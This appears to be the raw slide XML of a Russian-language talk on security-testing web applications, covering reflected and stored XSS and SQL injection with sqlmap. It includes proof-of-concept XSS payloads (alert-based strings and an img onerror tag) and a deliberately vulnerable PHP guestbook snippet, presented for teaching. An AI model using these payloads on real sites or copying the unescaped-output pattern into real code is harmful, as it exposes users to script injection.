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8F3BABE-EEB9-4215-B301-9E1A10BABE3D}">
  <a:tblStyle styleId="{88F3BABE-EEB9-4215-B301-9E1A10BABE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Добрый день, Наверняка вы задумывались о том как проверить ваш веб проект на умысел взлома, тем самым проверить на сколько хорошо написано ваше приложение. В этом докладе я расскажу как делать это. А также я понимаю что всех будут интересовать те или иные слайды и вы будете </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>отвлекаться</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t> фотканьям, чтоб этого не было вы можете закачать прям сейчас презентаху себе на телефон. Закачали? ну а теперь я вас могу поздравить с вирусом на вашем телефоне.</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Как мы видим в урл </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>добавлен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t> скрипт, который мы писали в инпут соответственно тот самый сео менеджер теперь может кидаться этим урликом кому попало, Еще лучше через всякие преобразователи урла может подхачит редирект на этот урл. Вы будете думать что этот урл безопасен а при переходе будете попадать на редирект с уязвимостью</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Следующий пример Хранимой xss, в учасниках у нас все тот же сео менеджер и обычный пользователь. Менеджер нашел уже уязвимость которая не требует отправки особых урлов. А обнаружил что есть уязвимость, которую единожды внедрил на сайт и все пока ее не убирут разрабы, она будет воспроизводиться постоянно. А именно засунул скриптик с картинкой в поле которое не подразумивает работу с картинками, но после отправки картинка отобразиться во всей своей красе и при каждом заходе пользователи будут видить ту самую рекламу в простом месенджере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И так следующий вид уязвимости в нашем шоу это sql injection. Достаточно распространенный среди php и wordpress проектов. Иногда встречеться и на других, но то уже из-за невнимательности разработчика, так как протект идет уже из коробки фреймворка</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Такие уязвимости будем искать с помощью приложения sqlmap.</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И так для начала бегло пройдемся о нашей развлекательной программе.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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9" name="Shape 4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5" name="Shape 4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4" name="Shape 5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9" name="Shape 5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8" name="Shape 5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8" name="Shape 5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Shape 5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4" name="Shape 5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Shape 5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Shape 5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Наверняка многие сталкивались с XSS уязвимостью на каких либо сайтах. Для тех кто не сталкивался, это когда вы заходите на сайт а там поверх него выпрыгивает какой-то попап с информацией не касающегося запрашиваемого сайта. Так сказать своим образом реклама портящая авторитет вашего сайта.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И так а теперь разберем с примерами как выглядит тот или другой вид xss. Начнем с отраженной. Для этого </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>эксперимента</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t> нам понадобиться - сео менеджер </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>освоивший</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t> новый вид распространения рекламы - распространение xss. И недалекий пользователь, которому можно впарить любую дичь. Сео менеджер находит что на таком-то сайте, допустим банке есть уязвимость которая выведет тот самый алерт, подставив в конце урла некий скрипт, который и вызывает эту уязвимость, ну а затем закинет эту ссылку пользователю с надписью заберите бабло через какой-то месенджер или почту</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ru"/>
              <a:t>и так в каких случаях такое может произойти. Есть код в котором есть уязвимость, которая выражается не закрытой правильно скобкой либо </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>апострофом, выражено это тем, что когда мы впишем в этот инпут, то это значение передается на обработку в этот самый код, соответственно в скрипте будет та самая недостающая скобка или апостроф, что и сгенерит нам вывод ошибки</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32.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId6"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evo.company/" TargetMode="Externa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4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hyperlink" Target="http://www.youtube.com/watch?v=AVaA_w-Lff8" TargetMode="External"/><Relationship Id="rId5"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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId5"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image" Target="../media/image10.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.jpg"/><Relationship Id="rId6"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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId7"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png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId12"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4.png"/><Relationship Id="rId8"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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.youtube.com/watch?v=xmgzLjMVj2k" TargetMode="External"/><Relationship Id="rId5"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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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0.jpg"/><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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.jpg"/><Relationship Id="rId6"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0.jp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0.jpg"/><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0.jpg"/><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0.jpg"/><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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.youtube.com/watch?v=9dzj-uRC4n8" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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1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10.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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10.jp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10.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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10.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.youtube.com/watch?v=_0XKVMXPDQA" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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10.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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10.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.jp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hyperlink" Target="https://test_xss.com/image?search" TargetMode="External"/><Relationship Id="rId7"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1.JPG" id="54" name="Shape 54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178025" y="-20151"/>
            <a:ext cx="8747400" cy="1133700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Как провести тестирование </a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>на безопасность Web application</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Shape 56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750638" y="1597650"/>
            <a:ext cx="3133725" cy="2933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2.JPG" id="148" name="Shape 148"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Shape 149"/>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Причина возникновения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id="151" name="Shape 151"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="861350" y="979675"/>
            <a:ext cx="6055526" cy="4043725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861350" y="1947750"/>
            <a:ext cx="3370800" cy="1056000"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936650" y="2163075"/>
            <a:ext cx="3221700" cy="416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ru" sz="1800"/>
              <a:t>')%3Balert('XSS')%3Bvar b=('</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2538000" y="1599750"/>
            <a:ext cx="1478400" cy="135000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="285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2.JPG" id="159" name="Shape 159"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>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Хранимые</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS </a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="lJ5AfkLBb7.jpg" id="162" name="Shape 162"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487200" y="1312471"/>
            <a:ext cx="2067150" cy="1519555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Shape 163"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629500" y="909700"/>
            <a:ext cx="2460900" cy="314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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEO менеджер</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="9585885-happy-office-worker.jpg" id="164" name="Shape 164"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7171688" y="1285391"/>
            <a:ext cx="1480925" cy="1429034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Shape 165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6805525" y="833500"/>
            <a:ext cx="2310600" cy="314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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Пользователь</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Выделение_049.jpg" id="166" name="Shape 166"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561128" y="3011100"/>
            <a:ext cx="4694225" cy="2012775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Shape 167"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1581438">
            <a:off x="3967121" y="4173357"/>
            <a:ext cx="1850135" cy="188233"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5762950" y="3466075"/>
            <a:ext cx="3278100" cy="806700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="88900" marR="88900" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;img src="http://inexist.ent" onerror="javascript:alert(1)"/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Shape 169"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422283" y="1838550"/>
            <a:ext cx="1279500" cy="28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1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bank.ua</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Shape 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339575" y="1863755"/>
            <a:ext cx="1155300" cy="389400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="2857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71" name="Shape 171"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2795963" y="2036900"/>
            <a:ext cx="1302000" cy="9300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="44546A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5632400" y="2046275"/>
            <a:ext cx="1431000" cy="5400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="44546A"/>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descr="2.JPG" id="177" name="Shape 177"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Shape 178"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="607001" y="152400"/>
            <a:ext cx="8384598" cy="47163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descr="2.JPG" id="183" name="Shape 183"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>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Причина возникновения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186" name="Shape 186"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486100" y="942725"/>
            <a:ext cx="7336200" cy="247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ru">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;?php</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if(isset($_POST['btnSign']))</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$message=trim($_POST['mtxMessage']);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$name=trim($_POST['txtName']);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 Обработка введенного значения переменной </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
              </a:rPr>
              <a:t>message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$message = stripslashes($message);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$message = mysql_real_escape_string($message);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 Обработка введенного значения переменной </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
              </a:rPr>
              <a:t>name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$name = mysql_real_escape_string($name);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$query = "INSERT INTO guestbook (comment,name)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 VALUES (</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'$message','$name');";</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$result=mysql_query($query) </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or die('&lt;pre&gt;'.mysql_error().'&lt;/pre&gt;');</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a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="187" name="Shape 187"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772350" y="1038600"/>
            <a:ext cx="4360075" cy="4104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1253125" y="1033050"/>
            <a:ext cx="6944100" cy="3956525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="193" name="Shape 193"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
